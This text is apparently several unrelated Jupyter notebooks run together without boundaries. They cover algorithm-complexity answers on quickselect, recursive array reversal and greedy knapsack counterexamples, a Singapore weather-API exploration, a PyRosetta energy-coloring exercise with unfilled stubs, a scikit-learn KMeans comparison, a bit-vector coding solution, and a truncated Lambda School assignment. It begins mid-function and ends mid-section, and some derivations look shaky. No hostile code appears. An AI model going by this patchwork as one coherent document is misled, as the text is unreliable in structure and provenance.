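    outliers = [x for x in data if x < lower or x > upper]
    return {'Q1': q1, 'median': median, 'Q3': q3, 'IQR': iqr, 'outliers': outliers}
```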
# TQ1
## Question 1
As known, given a random variable $X$, the Quantile function *Q($\cdot$)* with support $\{ p | p \in [0,1] \}$ is the function that computes:
\begin{equation}
Q(p)=s \hspace{0.2 cm} |\hspace{0.2 cm} \mathcal{P}(X<=s) = p
\end{equation}
Denoting with $A_i$ the i-th element of the vector $A$ of length $n$ and given $k \in [0,n]$, it is possible to see that our algorithm computes:<br>
\begin{equation}
alg(A,k)=s \hspace{0.2 cm} |\hspace{0.2 cm} \#\{A_i<=s\} = k
\end{equation}
It is then possible to perform some transformations over our algorithm's parameters in order to obtain the similarity with the quantile function, i.e.:
1. A shrinkage over our algorithm support space (i.e. $k'=k/n$);
2. A shrinkage over our cardinality measure (i.e. $\#\{A_i<=s \}'=\frac{\#\{A_i<=s \}}{n}$);
Substituting into our $alg(A,k)$ it becomes:
\begin{equation}
alg(A,k')=s\hspace{0.2 cm} |\hspace{0.2 cm} \frac{\#\{A_i<=s\}}{n} = k'
\end{equation}
In a frequentist approach (with $A_r$ a random sample of the vector $A$) we can equate $\frac{\#\{A_i<=s\}}{n}= \mathcal{P}(A_r <= s)$. In words, our algorithm computes the value $s$ such that the number of elements in the array $A$ smaller than or equal to $s$ equals $k$: we can thus define our algorithm as a "quantile function over a non-normalized support".
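The selection procedure described above (pick a random pivot $s$, split $A$ into $L$ and $R$, recurse) can be sketched as follows — a reconstruction assuming distinct elements, not necessarily the assignment's exact code:

```python
import random

def alg(A, k):
    """Return the value s such that #{A_i <= s} = k, i.e. the k-th
    smallest element of A (1-indexed), assuming distinct elements."""
    s = random.choice(A)            # random pivot
    L = [a for a in A if a < s]     # one scan of A: n operations
    R = [a for a in A if a > s]
    if len(L) == k - 1:             # exactly k elements are <= s
        return s
    elif len(L) >= k:               # the answer lies in L
        return alg(L, k)
    else:                           # the answer lies in R
        return alg(R, k - len(L) - 1)
```

Note that if the pivot is always the smallest element, each call discards a single value, which is exactly the worst case analysed in Question 2.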
## Question 2
We initially note that the subdivision of the array $A$ (on which we call $alg()$) into $L$ and $R$ requires scanning the whole vector $A$ (i.e. it requires $n=len(A)$ operations). Let us consider the worst case scenario: imagine that $k=n$ and that at each iteration the random sample $s$ is always equal to $A_1$. This means that the $s$ satisfying the condition on $k$ is selected at the $(n-1)$-th call of $alg()$ (the iteration at which the vector $A$ on which we call $alg()$ has length 2). We are thus removing a single element, the smallest element in $A$, at each call of $alg()$. Because of this, the number of operations needed to scan the vector $A$ decreases by one at each iteration of $alg()$. So we have that:
$$
T(n)=n+(n-1)+(n-2)+\dots+2 = \sum_{i=0}^{n-2}(n-i)=\frac{n(n+1)}{2}-1
$$
(We recall that the sum runs over $n-1$ terms because we need $n-1$ calls of $alg()$ to reach the right $s$.) We can thus conclude that the asymptotic complexity in the worst case scenario (removing constant terms) is $\mathcal{O}(n^2)$.
## Question 3
In the best case scenario, the right $s$ is picked at the first iteration: we only need $n$=len($A$) operations to scan $A$ and divide it into $L$ and $R$; the asymptotic complexity is then $\mathcal{O}(n)$.
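The algorithm itself is not listed in this section, so the following is a hypothetical Python sketch consistent with the description above (random sample $s$, split into $L$ and $R$); a three-way split is used here so that duplicate values are handled safely:

```python
import random

def alg(A, k):
    """Return the k-th smallest element of A (1 <= k <= len(A)),
    i.e. the value s such that #{A_i <= s} = k for distinct elements."""
    s = random.choice(A)                   # random pivot
    L = [x for x in A if x < s]            # elements smaller than s
    E = [x for x in A if x == s]           # copies of s itself
    if k <= len(L):                        # the answer lies in L
        return alg(L, k)
    if k <= len(L) + len(E):               # s is exactly the k-th smallest
        return s
    R = [x for x in A if x > s]            # otherwise recurse on R
    return alg(R, k - len(L) - len(E))

print(alg([7, 1, 5, 3, 9], 2))  # 3
```

On average the discarded part shrinks geometrically, which is why the typical running time is much closer to the best-case $\mathcal{O}(n)$ than to the worst-case $\mathcal{O}(n^2)$.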
# TQ2
## Question 1
Let us dive into the analysis of the given recursive algorithm's complexity. Expressing with $T(n)$ the time needed to complete the algorithm called with parameter $n$ (for any $l$), it is clear that:
\begin{equation}
T(n) = T\left(\frac{n}{2}\right)\cdot 2 + \left(\frac{n}{2}+1\right)\cdot 3
\end{equation}
Indeed, calling **splitSwap(a,l,n)** we have to solve **splitSwap(a,l,n/2)** twice, plus execute 3 operations for each of the $\left(\frac{n}{2}+1\right)$ iterations of the for loop inside **swapList(a,l,n)**. Let us expand the expression of $T(n)$:
\begin{equation}
T\left(\frac{n}{2}\right) = T\left(\frac{n}{2^2}\right)\cdot 2 + \left(\frac{n}{2^2}+1\right)\cdot 3
\end{equation}
\begin{equation}
T(n) = T\left(\frac{n}{2^2}\right)\cdot 2^2 + \left(\frac{n}{2^2}+1\right)\cdot2 \cdot 3 +\left(\frac{n}{2}+1\right)\cdot 3
\end{equation}
\begin{equation}
T(n) = T\left(\frac{n}{2^2}\right)\cdot 2^2 + \left(\frac{n}{2}+1\right)\cdot2 \cdot 3 +3
\end{equation}
\begin{equation}
T\left(\frac{n}{2^2}\right) = T\left(\frac{n}{2^3}\right)\cdot 2 + \left(\frac{n}{2^3}+1\right)\cdot 3
\end{equation}
\begin{equation}
T(n) = T\left(\frac{n}{2^3}\right)\cdot 2^3 + \left(\frac{n}{2}+1\right)\cdot 3 \cdot 3 + 12
\end{equation}
After $k$ expansions the pattern is (the additive constant is $3\,(2^k-k-1)$, which gives $3$ for $k=2$ and $12$ for $k=3$):
\begin{equation}
T(n) = T\left(\frac{n}{2^k}\right)\cdot 2^k + \left(\frac{n}{2}+1\right)\cdot k \cdot 3 + 3\,(2^k-k-1)
\end{equation}
Setting $2^k=n \Leftrightarrow k =\log_2(n)$ we obtain:
\begin{equation}
T(n) = T(1)\cdot n + \left(\frac{n}{2}+1\right)\cdot \log_2(n) \cdot 3 + 3\,(n-\log_2(n)-1) \simeq n\cdot \log_2(n)
\end{equation}
In the last step we have dropped constant factors and lower-order terms, keeping only the term with the largest growth rate with respect to $n$. We can therefore say that the asymptotic complexity of the algorithm is $\mathcal{O}(n\cdot \log_2 n)$.
## Question 2
Given an array **a**, an index **l** and a number **n** (considering the scenario where both **len(a)** and **n** are powers of 2), the algorithm outputs the array **a'** built as follows:
\begin{equation}
a'[i]=a[i] \hspace{1cm}\forall i \notin \{l, l+1, ..., l+n-1\}
\end{equation}
\begin{equation}
a'[l+i]=a[l+n-1-i] \hspace{1cm}\forall i \in \{0,1,...,n-1\}
\end{equation}
In words, starting from an index **l** of the original array **a**, the algorithm reverses the position of the first **n** elements of the array. Because of this it is of course required that **l+n** $\leq$ **len(a)**, otherwise the subroutine **swapList()** will raise an error because of the out-of-range indices it loops over. Let us describe the algorithm's mechanism. Looking at the code, we can see that the only part of the code actually changing the position of the array's elements is the subroutine **swapList()**. Given a triplet **(a,l,n)**, once **splitSwap()** is called, it will recursively call itself with an **n** halved call by call (i.e. **n**$^{(1)}$ =**n/2**, **n**$^{(2)}$ =**n**$^{(1)}/2$, **n**$^{(3)}$ =**n**$^{(2)}/2$ and so on). As we can see in Fig.1, after $\log_2(n)-1$ steps, the function **splitSwap(a,l,2)** will be called: in its execution both **splitSwap(a,l,1)** and **splitSwap(a,l+1,1)** will **return** (since **n**=1), finally allowing the execution of **swapList(a,l,2)** (which we will call a **final-node-subroutine** $\forall l$), which exchanges the array elements **a[l]** and **a[l+1]**. Once **splitSwap(a,l,2)** has completed, **splitSwap(a,l+2,2)** will be called. Similarly, at the end of its execution its **final-node-subroutine** will exchange the array elements **a[l+2]** and **a[l+3]**. Essentially the **final-node-subroutines** treat the array (starting from the element $a[l]$) as a sequence of $\frac{n}{2}$ couples of elements, and within each couple they exchange the 1st element with the 2nd one.
Recalling that **splitSwap(a,l,2)** and **splitSwap(a,l+2,2)** were called in **splitSwap(a,l,4)**, **swapList(a,l,4)** (which we will call a **semi-final-node-subroutine**) will finally be executed, exchanging the array elements **a[l]** with **a[l+2]** and **a[l+1]** with **a[l+3]**. The role of the **semi-final-node-subroutines** is thus to treat the array (starting from the element $a[l]$) as a sequence of $\frac{n}{4}$ couples of couples, and to exchange the 1st element of the 1st couple with the 1st element of the 2nd couple, and the 2nd element of the 1st couple with the 2nd element of the 2nd couple. In effect, after the execution of all the **final-node-subroutines** and **semi-final-node-subroutines**, the positions of the 1st group of 4 elements of the original array are reversed, and likewise for the 2nd group of 4 elements and so on. We can thus climb the recursion tree from the **final-node-subroutines** up to the top-level **swapList(a,l,n)** (the **first-final-node-subroutine**). The effect of each level of **subroutine** over a test array is shown in two examples (Fig.2, 3), recalling that the output of the **first-final-node-subroutine** equals the algorithm's output.
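The original source of **splitSwap()** is not reproduced in this section, so the following Python reconstruction is an assumption based on the description above; it makes the reversing behaviour easy to check:

```python
def swap_list(a, l, n):
    # Exchange the first half of a[l:l+n] with the second half, element-wise.
    half = n // 2
    for i in range(half):
        a[l + i], a[l + half + i] = a[l + half + i], a[l + i]

def split_swap(a, l, n):
    # Recursively process both halves, then swap them (n assumed a power of 2).
    if n <= 1:
        return
    split_swap(a, l, n // 2)
    split_swap(a, l + n // 2, n // 2)
    swap_list(a, l, n)

a = list(range(8))
split_swap(a, 0, 8)
print(a)  # [7, 6, 5, 4, 3, 2, 1, 0]
```

Each half is reversed recursively and then the two halves are exchanged, which by induction reverses the whole block of **n** elements starting at index **l**.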
Having assessed that the algorithm's complexity is $\mathcal{O}(n\cdot \log_2 n)$, we can conclude that the algorithm is not optimal: in fact, it is easy to write some pseudo-code with a lower complexity than the given algorithm:
```python
def reverse(a, l, n):
    # copy the array so that reads from `a` are not overwritten mid-loop
    reversed_array = list(a)
    for i in range(n):
        reversed_array[l + i] = a[l + n - 1 - i]
    return reversed_array
```
We can easily see that the **reverse()** algorithm's complexity is now (removing constant terms and factors) $O(n)$, proving that the **splitSwap()** algorithm was not optimal.
In order:<br>
Fig.1 :Reaching the first final-node-subroutine<br>
Fig.2 :Test over a with len(a)=n=16, l=0<br>
Fig.3 :Test over a with len(a)=16, n=8, l=7<br>

<figcaption align="center"> Fig.1 :Reaching the first final-node-subroutine</figcaption>
<figcaption align="center"> Fig.2 :Test over a with len(a)=n=16, l=0</figcaption>
<figcaption align="center"> Fig.3 :Test over a with len(a)=16, n=8, l=7</figcaption>
# TQ3: Knapsack
In this theoretical question we face an NP-complete problem: the Knapsack problem. In general it is tackled with heuristic solutions, but in some cases these fail to provide the optimal solution.
* The first heuristic solution is a greedy algorithm in which we order the objects in increasing order of weight and then visit them sequentially, adding them to the solution as long as the budget is not exceeded. This algorithm does not provide the optimal solution in every situation; indeed, in my counterexample this greedy algorithm fails. We fix the budget **W** = 10 and take three objects.
|i |w_i| v_i|
|-----|---|----|
|1 |4 |3 |
|2 |6 |5 |
|3 |10 |9 |
We visit the objects sequentially, so we pick the first two, but we cannot pick the third one because we would exceed the budget. This choice is not optimal: it would be better to pick only the third object, since its value (9) is greater than the sum of the values of the first two (8).
* In the second heuristic solution we order the objects in decreasing order of value, and then visit them sequentially, adding them to the solution if the budget is not exceeded. This algorithm does not provide the optimal solution in every situation; indeed, in my counterexample this greedy algorithm fails. I have chosen the same budget **W** = 10 and the same number of objects as in the last counterexample.
|i |w_i| v_i|
|-----|---|----|
|1 |9 |9 |
|2 |7 |7 |
|3 |3 |3 |
We visit the objects sequentially, so we pick the first object, but we cannot pick the last two because we would exceed the budget. This choice is not optimal: it would be better to pick the second and the third objects, because the sum of their values (10) is greater than the first object's value (9).
* In the third heuristic solution we order the objects in decreasing relative value ($v_i/w_i$), and then visit them sequentially, adding them to the solution if the budget is not exceeded.
This algorithm does not provide the optimal solution in every situation; indeed, in my counterexample this greedy algorithm fails. I have chosen the same budget **W** = 10 and the same number of objects as in the two previous counterexamples.
|i |w_i| v_i|
|-----|---|----|
|1 |7 |9 |
|2 |6 |6 |
|3 |4 |4 |
We visit the objects sequentially, so we pick the first object, whose relative value is 1.29 while that of the other objects is 1. We cannot pick the last two because we would exceed the budget. This choice is not optimal: it would be better to pick the second and the third objects, because the sum of their values (10) is greater than the first object's value (9).
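As an illustration, the third heuristic and its counterexample can be sketched in a few lines of Python (a sketch; the item tuples and function name are mine):

```python
def greedy_by_ratio(items, W):
    """Greedy knapsack: visit items in decreasing value/weight order,
    taking each item that still fits in the budget W."""
    total_w, total_v = 0, 0
    for w, v in sorted(items, key=lambda t: t[1] / t[0], reverse=True):
        if total_w + w <= W:
            total_w += w
            total_v += v
    return total_v

items = [(7, 9), (6, 6), (4, 4)]   # (w_i, v_i) from the table above
print(greedy_by_ratio(items, 10))  # 9, although taking objects 2 and 3 gives 10
```

The greedy choice commits to the high-ratio object of weight 7 and then cannot fit anything else, missing the optimal pair with total value 10.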
# explore_data_gov_sg_api
## Purpose:
Explore the weather-related APIs at https://developers.data.gov.sg.
## History:
- 2017-05 - Benjamin S. Grandey
- 2017-05-29 - Moving from atmos-scripts repository to access-data-gov-sg repository, and renaming from data_gov_sg_explore.ipynb to explore_data_gov_sg_api.ipynb.
```
import matplotlib.pyplot as plt
import pandas as pd
import requests
import seaborn as sns
%matplotlib inline
# Get my API keys
from my_api_keys import my_api_dict
# Note: this module, containing my API keys, will not be shared via GitHub
# You can obtain your own API key(s) by registering at https://developers.data.gov.sg
my_key = my_api_dict['data.gov.sg'] # API key for data.gov.sg
```
## Meta-data for available meteorological APIs
[I added this section after exploring the wind-speed data - see below.]
```
# Meteorological variables
for variable in ['rainfall', 'wind-speed', 'wind-direction', 'air-temperature', 'relative-humidity']:
print(variable)
r = requests.get('https://api.data.gov.sg/v1/environment/{}'.format(variable),
headers={'api-key': my_key})
metadata = r.json()['metadata']
for key in metadata.keys():
if key != 'stations': # don't print information about stations
print(' {}: {}'.format(key, r.json()['metadata'][key]))
# 1hr PM2.5 data are also available
r = requests.get('https://api.data.gov.sg/v1/environment/{}'.format('pm25'),
headers={'api-key': my_key})
r.json()
```
## Wind-speed
```
# Query without specifying date_time - returns most recent data?
!date
r = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',
headers={'api-key': my_key})
r.json()
# Re-organize data into DataFrame
df = pd.DataFrame(r.json()['items'][0]['readings'])
df = df.rename(columns={'value': 'wind-speed'})
df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
df
# Get wind-speed for specific time in past
r = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',
headers={'api-key': my_key},
params={'date_time': '2016-12-10T00:00:00'})
df = pd.DataFrame(r.json()['items'][0]['readings'])
df = df.rename(columns={'value': 'wind-speed'})
df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
df
# Get wind-speed at 5-min intervals on a specific date
# Note: if 'date' is used instead of 'date_time', the API appears to timeout
wind_speed_frames = []
for dt in pd.date_range('2017-05-24', periods=(24*12+1), freq='5min'):
    r = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',
                     headers={'api-key': my_key},
                     params={'date_time': dt.strftime('%Y-%m-%dT%H:%M:%S')})
    temp_df = pd.DataFrame(r.json()['items'][0]['readings'])
    temp_df = temp_df.rename(columns={'value': 'wind-speed'})
    temp_df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
    wind_speed_frames.append(temp_df)
# DataFrame.append was removed in pandas 2.0, so concatenate the frames instead
wind_speed_df = pd.concat(wind_speed_frames, ignore_index=True)
wind_speed_df.head(15)
wind_speed_df.info()
wind_speed_df.groupby('station_id').describe()
```
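The query-and-reshape pattern repeated above could be factored into a small helper. Here is a sketch that operates on the already-parsed JSON payload (the helper name is mine; the response shape is assumed from the cells above):

```python
import pandas as pd

def readings_to_df(payload, variable):
    # Reshape one parsed /v1/environment response into a tidy DataFrame
    item = payload['items'][0]
    df = pd.DataFrame(item['readings']).rename(columns={'value': variable})
    df['timestamp (SGT)'] = pd.to_datetime(item['timestamp'].split('+')[0])
    return df

# Minimal payload with the shape returned by the API:
payload = {'items': [{'timestamp': '2017-05-24T00:00:00+08:00',
                      'readings': [{'station_id': 'S50', 'value': 1.2},
                                   {'station_id': 'S107', 'value': 0.8}]}]}
print(readings_to_df(payload, 'wind-speed'))
```

Keeping the reshaping separate from the HTTP call also makes it easy to test without network access.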
## Rainfall
```
# Get rainfall at 5-min intervals on a specific date
rainfall_frames = []
for dt in pd.date_range('2017-05-24', periods=(24*12+1), freq='5min'):  # I remember this was a wet day
    r = requests.get('https://api.data.gov.sg/v1/environment/rainfall',
                     headers={'api-key': my_key},
                     params={'date_time': dt.strftime('%Y-%m-%dT%H:%M:%S')})
    temp_df = pd.DataFrame(r.json()['items'][0]['readings'])
    temp_df = temp_df.rename(columns={'value': 'rainfall'})
    temp_df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
    rainfall_frames.append(temp_df)
# DataFrame.append was removed in pandas 2.0, so concatenate the frames instead
rainfall_df = pd.concat(rainfall_frames, ignore_index=True)
rainfall_df.head(15)
rainfall_df.info()
rainfall_df['rainfall'] = rainfall_df['rainfall'].astype('float') # convert to float
rainfall_df.info()
```
## Merge wind-speed and rainfall DataFrames
```
# Union of wind-speed and rainfall data
outer_df = pd.merge(wind_speed_df, rainfall_df, how='outer', on=['station_id', 'timestamp (SGT)'])
outer_df.head(15)
outer_df.info()
# Intersection of wind-speed and rainfall data
inner_df = pd.merge(wind_speed_df, rainfall_df, how='inner', on=['station_id', 'timestamp (SGT)'])
inner_df.head(15)
inner_df.info()
inner_df.groupby('station_id').describe()
# Quick look at relationship between rainfall and wind-speed for one station and one day
# Information about station S50
r = requests.get('https://api.data.gov.sg/v1/environment/rainfall',
headers={'api-key': my_key},
params={'date_time': '2017-05-04T00:00:00'})
for d in r.json()['metadata']['stations']:
if d['device_id'] == 'S50':
print(d)
# Select data for station S50
s50_df = inner_df.loc[inner_df['station_id'] == 'S50']
# Plot
sns.jointplot(x=s50_df['rainfall'], y=s50_df['wind-speed'], kind='scatter')
```
Before you turn this problem in, make sure everything runs as expected. First, **restart the kernel** (in the menubar, select Kernel$\rightarrow$Restart) and then **run all cells** (in the menubar, select Cell$\rightarrow$Run All).
Make sure you fill in any place that says `YOUR CODE HERE` or "YOUR ANSWER HERE", as well as your name and collaborators below:
```
NAME = ""
COLLABORATORS = ""
```
---
<!--NOTEBOOK_HEADER-->
*This notebook contains material from [PyRosetta](https://RosettaCommons.github.io/PyRosetta.notebooks);
content is available [on Github](https://github.com/RosettaCommons/PyRosetta.notebooks.git).*
<!--NAVIGATION-->
< [Practice: Analyzing energy between residues](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.02-Analyzing-energy-between-residues.ipynb) | [Contents](toc.ipynb) | [Index](index.ipynb) | [Introduction to Folding](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/04.00-Introduction-to-Folding.ipynb) ><p><a href="https://colab.research.google.com/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.03-Energies-and-the-PyMOLMover.ipynb"><img align="left" src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab" title="Open in Google Colaboratory"></a>
# Energies and the PyMOL Mover
Keywords: send_energy(), label_energy(), send_hbonds()
```
# Notebook setup
import sys
if 'google.colab' in sys.modules:
!pip install pyrosettacolabsetup
import pyrosettacolabsetup
pyrosettacolabsetup.setup()
print ("Notebook is set for PyRosetta use in Colab. Have fun!")
from pyrosetta import *
from pyrosetta.teaching import *
init()
```
**Make sure you are in the directory with the pdb files:**
`cd google_drive/My\ Drive/student-notebooks/`
```
# From previous section:
ras = pyrosetta.pose_from_pdb("inputs/6Q21_A.pdb")
sfxn = get_fa_scorefxn()
```
The `PyMOLMover` class contains a method for sending score function information to PyMOL,
which will then color the structure based on relative residue energies.
Open up PyMOL. Instantiate a `PyMOLMover` object and use the `pymol_mover.send_energy(ras)` to send the coloring command to PyMOL.
```
pymol_mover = PyMOLMover()
pymol_mover.apply(ras)
print(sfxn(ras))
pymol_mover.send_energy(ras)
```
```
# YOUR CODE HERE
raise NotImplementedError()
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
from IPython import display
from pathlib import Path
gifPath = Path("./Media/PyMOL-send_energy.gif")
# Display GIF in Jupyter, CoLab, IPython
with open(gifPath,'rb') as f:
display.Image(data=f.read(), format='png',width='800')
```
What color is residue Proline34? What color is residue Alanine66? Which residue has lower energy?
```
# your response here
```
`pymol_mover.send_energy(ras, fa_atr)` will have PyMOL color only by the attractive van der Waals energy component. What color is residue 34 if colored by solvation energy, `fa_sol`?
```
# send specific energies to pymol
# YOUR CODE HERE
raise NotImplementedError()
```
You can have PyMOL label each Cα with the value of its residue’s specified energy using:
```
pymol_mover.label_energy(ras, "fa_atr")
```
```
# YOUR CODE HERE
raise NotImplementedError()
```
Finally, if you have scored the `pose` first, you can have PyMOL display all of the calculated hydrogen bonds for the structure:
```
pymol_mover.send_hbonds(ras)
```
```
# YOUR CODE HERE
raise NotImplementedError()
```
## References
This Jupyter notebook is an adapted version of "Workshop #3: Scoring" in the PyRosetta workbook: https://graylab.jhu.edu/pyrosetta/downloads/documentation/pyrosetta4_online_format/PyRosetta4_Workshop3_Scoring.pdf
<!--NAVIGATION-->
< [Practice: Analyzing energy between residues](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.02-Analyzing-energy-between-residues.ipynb) | [Contents](toc.ipynb) | [Index](index.ipynb) | [Introduction to Folding](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/04.00-Introduction-to-Folding.ipynb) ><p><a href="https://colab.research.google.com/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.03-Energies-and-the-PyMOLMover.ipynb"><img align="left" src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab" title="Open in Google Colaboratory"></a>
This model will cluster a set of data, first with KMeans and then with MiniBatchKMeans, and plot the results. It will also plot the points that are labelled differently between the two algorithms.
```
import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import MiniBatchKMeans, KMeans
from sklearn.metrics.pairwise import pairwise_distances_argmin
from sklearn.datasets import make_blobs
# Generate sample data
np.random.seed(0)
batch_size = 45
centers = [[1, 1], [-1, -1], [1, -1]]
n_clusters = len(centers)
X, labels_true = make_blobs(n_samples=3000, centers=centers, cluster_std=0.7)
# Compute clustering with Means
k_means = KMeans(init="k-means++", n_clusters=3, n_init=10)
t0 = time.time()
k_means.fit(X)
t_batch = time.time() - t0
# Compute clustering with MiniBatchKMeans
mbk = MiniBatchKMeans(
init="k-means++",
n_clusters=3,
batch_size=batch_size,
n_init=10,
max_no_improvement=10,
verbose=0,
)
t0 = time.time()
mbk.fit(X)
t_mini_batch = time.time() - t0
# Plot result
fig = plt.figure(figsize=(8, 3))
fig.subplots_adjust(left=0.02, right=0.98, bottom=0.05, top=0.9)
colors = ["#4EACC5", "#FF9C34", "#4E9A06"]
# We want to have the same colors for the same cluster from the
# MiniBatchKMeans and the KMeans algorithm. Let's pair the cluster centers per
# closest one.
k_means_cluster_centers = k_means.cluster_centers_
order = pairwise_distances_argmin(k_means.cluster_centers_, mbk.cluster_centers_)
mbk_means_cluster_centers = mbk.cluster_centers_[order]
k_means_labels = pairwise_distances_argmin(X, k_means_cluster_centers)
mbk_means_labels = pairwise_distances_argmin(X, mbk_means_cluster_centers)
# KMeans
ax = fig.add_subplot(1, 3, 1)
for k, col in zip(range(n_clusters), colors):
my_members = k_means_labels == k
cluster_center = k_means_cluster_centers[k]
ax.plot(X[my_members, 0], X[my_members, 1], "w", markerfacecolor=col, marker=".")
ax.plot(
cluster_center[0],
cluster_center[1],
"o",
markerfacecolor=col,
markeredgecolor="k",
markersize=6,
)
ax.set_title("KMeans")
ax.set_xticks(())
ax.set_yticks(())
plt.text(-3.5, 1.8, "train time: %.2fs\ninertia: %f" % (t_batch, k_means.inertia_))
# MiniBatchKMeans
ax = fig.add_subplot(1, 3, 2)
for k, col in zip(range(n_clusters), colors):
my_members = mbk_means_labels == k
cluster_center = mbk_means_cluster_centers[k]
ax.plot(X[my_members, 0], X[my_members, 1], "w", markerfacecolor=col, marker=".")
ax.plot(
cluster_center[0],
cluster_center[1],
"o",
markerfacecolor=col,
markeredgecolor="k",
markersize=6,
)
ax.set_title("MiniBatchKMeans")
ax.set_xticks(())
ax.set_yticks(())
plt.text(-3.5, 1.8, "train time: %.2fs\ninertia: %f" % (t_mini_batch, mbk.inertia_))
# Initialise the different array to all False
different = mbk_means_labels == 4
ax = fig.add_subplot(1, 3, 3)
for k in range(n_clusters):
different += (k_means_labels == k) != (mbk_means_labels == k)
identic = np.logical_not(different)
ax.plot(X[identic, 0], X[identic, 1], "w", markerfacecolor="#bbbbbb", marker=".")
ax.plot(X[different, 0], X[different, 1], "w", markerfacecolor="m", marker=".")
ax.set_title("Difference")
ax.set_xticks(())
ax.set_yticks(())
plt.show()
```
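The center-pairing step above relies on `pairwise_distances_argmin`. A tiny standalone example (array values chosen for illustration) shows what it returns: for each row of the first array, the index of the nearest row of the second array.

```python
import numpy as np
from sklearn.metrics.pairwise import pairwise_distances_argmin

a = np.array([[0.0, 0.0], [5.0, 5.0]])
b = np.array([[4.9, 5.1], [0.1, -0.1]])
# For each row of a, the index of the closest row of b:
print(pairwise_distances_argmin(a, b))  # [1 0]
```

This is why indexing `mbk.cluster_centers_` with `order` lines each MiniBatchKMeans center up with its nearest KMeans center, so matching clusters get matching colors.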
This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges).
# Solution Notebook
## Problem: Given an array of n integers, find an int not in the input. Use a minimal amount of memory.
* [Constraints](#Constraints)
* [Test Cases](#Test-Cases)
* [Algorithm](#Algorithm)
* [Code](#Code)
* [Unit Test](#Unit-Test)
## Constraints
* Are we working with non-negative ints?
* Yes
* What is the range of the integers?
* Discuss the approach for 4 billion integers
* Implement for 32 integers
* Can we assume the inputs are valid?
* No
## Test Cases
* None -> Exception
* [] -> Exception
* General case
* There is an int excluded from the input -> int
* There isn't an int excluded from the input -> None
## Algorithm
The problem states to use a minimal amount of memory. We'll use a bit vector to keep track of the inputs.
Say we are given 4 billion integers, which is 2^32 integers. The number of non-negative 32-bit integers would be 2^31. With a bit vector, we'll need 4 billion bits to map each integer to a bit. Say we had only 1 GB of memory, or 2^30 bytes: this gives us 2^33 bits, about 8 billion bits, which is enough for the bit vector.
To simplify this exercise, we'll work with an input of up to 32 ints that we'll map to a bit vector of 32 bits.
<pre>
input = [0, 1, 2, 3, 4...28, 29, 31]
bytes [ 1 ] [ 2 ] [ 3 ] [ 4 ]
index = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
bit_vector = 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1
result = 30
* Loop through each item in the input, setting bit_vector[item] = True.
* Loop through the bit_vector, return the first index where bit_vector[item] == False.
</pre>
Complexity:
* Time: O(b), where b is the number of bits
* Space: O(b)
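The same idea can be sketched without any third-party dependency by using a plain Python int as the bit vector (a sketch with names of my choosing, not the solution class below):

```python
def find_missing(array, max_size):
    """Return the first int in [0, max_size) not present in array,
    using a Python int as the bit vector."""
    if not array:
        raise TypeError('array cannot be None or empty')
    bits = 0
    for item in array:
        bits |= 1 << item               # set bit `item` to mark it as seen
    for index in range(max_size):
        if not (bits >> index) & 1:     # first unset bit = excluded int
            return index
    return None

print(find_missing(list(range(30)) + [31], 32))  # 30
```

Python ints grow as needed, so the same function works for any `max_size`; the dedicated `bitstring` class below makes the fixed-width bit vector explicit.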
## Code
```
from bitstring import BitArray # Run pip install bitstring
class Bits(object):
def new_int(self, array, max_size):
if not array:
raise TypeError('array cannot be None or empty')
bit_vector = BitArray(max_size)
for item in array:
bit_vector[item] = True
for index, item in enumerate(bit_vector):
if not item:
return index
return None
```
## Unit Test
```
# %%writefile test_new_int.py
from nose.tools import assert_equal, assert_raises
class TestBits(object):
def test_new_int(self):
bits = Bits()
max_size = 32
assert_raises(TypeError, bits.new_int, None, max_size)
assert_raises(TypeError, bits.new_int, [], max_size)
data = [item for item in range(30)]
data.append(31)
assert_equal(bits.new_int(data, max_size), 30)
data = [item for item in range(32)]
assert_equal(bits.new_int(data, max_size), None)
print('Success: test_find_int_excluded_from_input')
def main():
test = TestBits()
test.test_new_int()
if __name__ == '__main__':
main()
%run -i test_new_int.py
```
Lambda School Data Science
*Unit 2, Sprint 2, Module 4*
---
# Classification Metrics
## Assignment
- [ ] If you haven't yet, [review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
- [ ] Plot a confusion matrix for your Tanzania Waterpumps model.
- [ ] Continue to participate in our Kaggle challenge. Every student should have made at least one submission that scores at least 70% accuracy (well above the majority class baseline).
- [ ] Submit your final predictions to our Kaggle competition. Optionally, go to **My Submissions**, and _"you may select up to 1 submission to be used to count towards your final leaderboard score."_
- [ ] Commit your notebook to your fork of the GitHub repo.
- [ ] Read [Maximizing Scarce Maintenance Resources with Data: Applying predictive modeling, precision at k, and clustering to optimize impact](https://towardsdatascience.com/maximizing-scarce-maintenance-resources-with-data-8f3491133050), by Lambda DS3 student Michael Brady. His blog post extends the Tanzania Waterpumps scenario, far beyond what's in the lecture notebook.
## Stretch Goals
### Reading
